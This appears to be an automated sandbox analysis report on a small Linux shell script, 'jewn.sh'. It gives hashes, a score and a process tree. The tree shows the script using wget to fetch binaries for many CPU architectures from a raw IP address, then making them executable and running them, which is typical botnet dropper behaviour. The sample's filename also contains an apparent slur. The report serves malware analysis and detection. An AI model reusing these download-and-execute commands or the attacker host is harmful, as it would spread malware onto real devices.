Analysis
-
max time kernel
0s -
max time network
123s -
platform
linux_mips -
resource
debian9-mipsbe-en-20211208 -
resource tags
arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
08-02-2023 06:31
Static task
static1
Behavioral task
behavioral1
Sample
jewn.sh
Resource
ubuntu1804-amd64-en-20211208
ubuntu-18.04-amd64
1 signatures
150 seconds
Behavioral task
behavioral2
Sample
jewn.sh
Resource
debian9-armhf-20221111-en
debian-9-armhf
1 signatures
150 seconds
Behavioral task
behavioral3
Sample
jewn.sh
Resource
debian9-mipsbe-en-20211208
debian-9-mips
1 signatures
150 seconds
Behavioral task
behavioral4
Sample
jewn.sh
Resource
debian9-mipsel-20221111-en
debian-9-mipsel
1 signatures
150 seconds
General
-
Target
jewn.sh
-
Size
1KB
-
MD5
2097bb27333c25ce9708e90de1604d99
-
SHA1
5e26a804a9ee8922e12e8eb3aab85cdd83235ebb
-
SHA256
fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645
-
SHA512
7417d2e7a5c2266038244ccf0c9efcc6007766e10221f8fc65f74bc5559e060d0d0ee771cd8eaaf9db5269d4cf1af84bc07f65dff60a89d64565a721dd64eb53
Score
5/10
Malware Config
Signatures
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process /tmp/jewn.sh /tmp/jewn.sh jewn.sh
Processes
-
/tmp/jewn.sh/tmp/jewn.sh1⤵
- Writes file to tmp directory
PID:323 -
/usr/bin/wgetwget http://194.180.48.156/bins/jew.x862⤵PID:324
-
-
/bin/catcat jew.x862⤵PID:330
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:331
-
-
./jewn./jewn2⤵PID:332
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.mips2⤵PID:334
-
-
/bin/catcat jew.mips2⤵PID:336
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:337
-
-
./jewn./jewn2⤵PID:338
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.mpsl2⤵PID:340
-
-
/bin/catcat jew.mpsl2⤵PID:342
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:343
-
-
./jewn./jewn2⤵PID:344
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm42⤵PID:346
-
-
/bin/catcat jew.arm42⤵PID:348
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:349
-
-
./jewn./jewn2⤵PID:350
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm52⤵PID:352
-
-
/bin/catcat jew.arm52⤵PID:354
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:355
-
-
./jewn./jewn2⤵PID:356
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm62⤵PID:358
-
-
/bin/catcat jew.arm62⤵PID:360
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:361
-
-
./jewn./jewn2⤵PID:362
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm72⤵PID:364
-
-
/bin/catcat jew.arm72⤵PID:366
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:367
-
-
./jewn./jewn2⤵PID:368
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.ppc2⤵PID:370
-
-
/bin/catcat jew.ppc2⤵PID:372
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:373
-
-
./jewn./jewn2⤵PID:374
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.m68k2⤵PID:376
-
-
/bin/catcat jew.m68k2⤵PID:378
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:379
-
-
./jewn./jewn2⤵PID:380
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.sh42⤵PID:382
-
-
/bin/catcat jew.sh42⤵PID:384
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M2⤵PID:385
-
-
./jewn./jewn2⤵PID:386
-